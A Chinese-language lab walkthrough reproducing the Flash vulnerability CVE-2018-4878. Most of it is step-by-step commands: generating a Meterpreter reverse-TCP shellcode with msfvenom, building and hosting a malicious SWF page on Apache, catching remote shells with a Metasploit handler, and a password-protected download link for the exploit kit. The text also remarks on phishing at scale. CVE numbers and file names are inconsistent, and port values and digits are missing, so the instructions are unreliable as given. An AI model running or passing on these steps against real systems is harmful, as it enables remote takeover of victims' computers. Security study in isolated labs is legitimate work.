[漏洞复现]CVE-2018-4887 Flash 0day

1、漏洞概述

2018年2月1号，Adobe官方发布安全通报（APSA18-01），声明Adobe Flash 28.0.0.137及其之前的版本，存在高危漏洞（CVE-2018-4878）。

攻击者通过构造特殊的Flash链接，当用户用浏览器/邮件/Office访问此Flash链接时，会被“远程代码执行”，并且直接被getshell。

2、实验环境

攻击机：kali 2017 + exp：cve-2018-4878.py

攻击机IP：192.168.190.130

靶机：Windows 7 + flash：flashplayer_activex_28.0.0.137.exe

靶机IP：192.168.190.131

3、实验利用工具

链接: https://pan.baidu.com/s/1nnUCy8xPbcIgT24ddo6D1A 密码: e292

4、漏洞复现

将网盘中的CVE-2018-4878-master目录下载下来，并放入kali linux 桌面

使用msfvenom生成shell代码

生成代码，其中lhost为kali的ip地址，lport为自定义的端口号
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.190.130 lport= -f python>shellcode.txt

查看代码
root@kali:~# cat shellcode.txt 

在CVE-2018-4878-master目录，编辑CVE-2018-2878.py

将上面msfvenom生成的代码覆盖原来的代码，如下：

修改CVE-2018-4878.py下面的文件信息（后面会用到，之后保存修改退出）：

进入CVE-2018-4878-master路径，用Python执行CVE-2018-4878.py代码

进入CVE---master路径
root@kali:~# cd 桌面/CVE---master
执行CVE--.py代码
root@kali:~/桌面/CVE---master# python cve--.py 

执行完后会多出两个文件

kali linux 开启Apache2服务，并将上面生成的2个文件放入/var/www/html目录中

root@kali:~/桌面/CVE---master# service apache2 start
root@kali:~/桌面/CVE---master# cp index2.html /var/www/html/index2.html
root@kali:~/桌面/CVE---master# cp exploit.swf /var/www/html/exploit.swf

此时，Kali Linux上Web服务启动，并且具备index2.html这个页面。只要靶机启用flash并访问了这个页面，则可以直接被控制。

kali开启shell会话监听

启动msf
root@kali:~# msfconsole
使用handler监听模块
msf > use exploit/multi/handler
设置一个tcp回弹连接
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
设置kali渗透机的ip地址
msf exploit(handler) > set LHOST 192.168.190.130
设置监听端口，这个需跟上面msfvenom设置的端口一致
msf exploit(handler) > set LPORT
开启监听，等待肉鸡上线
msf exploit(handler) > exploit 

在win 7中安装flash插件，并用IE浏览器访问页面

将网盘中的flash安装包下载下来放到Windows 7中，并安装

使用Win 7内置的IE 8浏览器访问页面192.168.190.130/index2.html

在kali linux上获取meterpreter shell，并进行管理

查看会话
msf exploit(handler) > sessions
连接会话
msf exploit(handler) > sessions -i 

实验总结：

可以看到，最终由于Flash存在CVE-2018-4878这个高危漏洞，导致Windows靶机访问含flash的页面时，直接被Kali Linux控制。

真实环境下，很多黑客基于此Flash漏洞，结合社会工程学，例如将网页链接放置在诱导邮件中，欺骗大量用户点击，来达到最规模攻击效果。